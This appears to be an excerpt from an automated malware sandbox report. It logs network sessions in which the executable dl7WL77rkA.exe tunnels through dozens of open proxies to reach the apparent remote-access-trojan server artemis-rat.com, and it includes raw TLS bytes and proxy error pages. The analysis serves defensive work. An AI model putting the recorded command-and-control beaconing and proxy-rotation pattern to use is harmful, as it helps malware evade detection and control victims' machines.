                                                                                                                                                                                                                                                            X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                                                                                                                                                                                                                                                            X-Cache: MISS from ns547184.ip-139-99-148.net
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                                                                                                                                                                                                                                            Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-/


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1110192.168.2.55294318.228.198.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.254632950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.581552029 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.594846964 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c d1 0a 1b 26 73 6e 7d b0 ef 06 2d 4a 6d d2 e6 e6 a0 c5 e4 ac ab 2e 0f 32 30 c4 85 95 64 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhel&sn}-Jm.20d*,+0/$#('=<5/artemis-rat.com#`9["%1-u;raemk" `;]jiK.#ivoay#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.922173977 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 9f 6a 46 d6 ec 6e 90 14 3b 91 34 a1 b4 27 19 5e 70 fa b3 a0 25 ed 59 b1 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9jFn;4'^p%YDOWNGRD0000*H010Uartemis-rat.com0240311015326Z260311015326Z010Uartemis-rat.com0"0*H0RS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.026077986 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 9b 1f a6 5e 97 ae 52 f6 6e 1e 36 c7 ff f5 70 54 87 de ed e5 0c a8 ee bd d9 05 2c 7f 53 22 60 00 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 36 58 eb bd a2 34 23 44 14 3e 49 5e 8b dd 42 d4 c0 3b 78 92 18
                                                                                                                                                                                                                                                            Data Ascii: %! ^Rn6pT,S"`(6X4#D>I^B;x\v1c
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.351882935 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 06 be 74 f1 8c fa 7a 03 7d dd c0 9a 1f 31 10 81 c7 4e 97 a5 d8 6c 50 aa 1f 4a 66 bd 3e be f8 6a 40 df 43 1f 55 3d 03 ba
                                                                                                                                                                                                                                                            Data Ascii: (tz}1NlPJf>j@CU=


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1111192.168.2.55292836.92.81.18141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.254934072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1112192.168.2.55302472.167.222.113395743876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.257531881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1113192.168.2.552995147.124.212.31242303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.258810997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806344986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490557909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.695132017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083539009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405575991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.811322927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.509557009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1114192.168.2.552950178.128.113.118231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.261372089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.099472046 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1115192.168.2.552957185.49.30.580813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.272599936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1116192.168.2.552948148.66.130.53563503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.275378942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.107947111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.180085897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.266851902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468164921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.717565060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1117192.168.2.552941114.255.132.6031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.276257038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.104173899 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                            Server: squid/3.5.27
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3938
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_DNS_FAIL 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {marg


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1118192.168.2.552924114.55.84.12300013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.283380985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.634098053 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1119192.168.2.553083172.67.127.188803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.284259081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.438546896 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1120192.168.2.55301712.176.231.147803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.359186888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.565798044 CET169INHTTP/1.0 400 Bad request
                                                                                                                                                                                                                                                            cache-control: no-cache
                                                                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1121192.168.2.55099351.75.125.208409983876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.359188080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
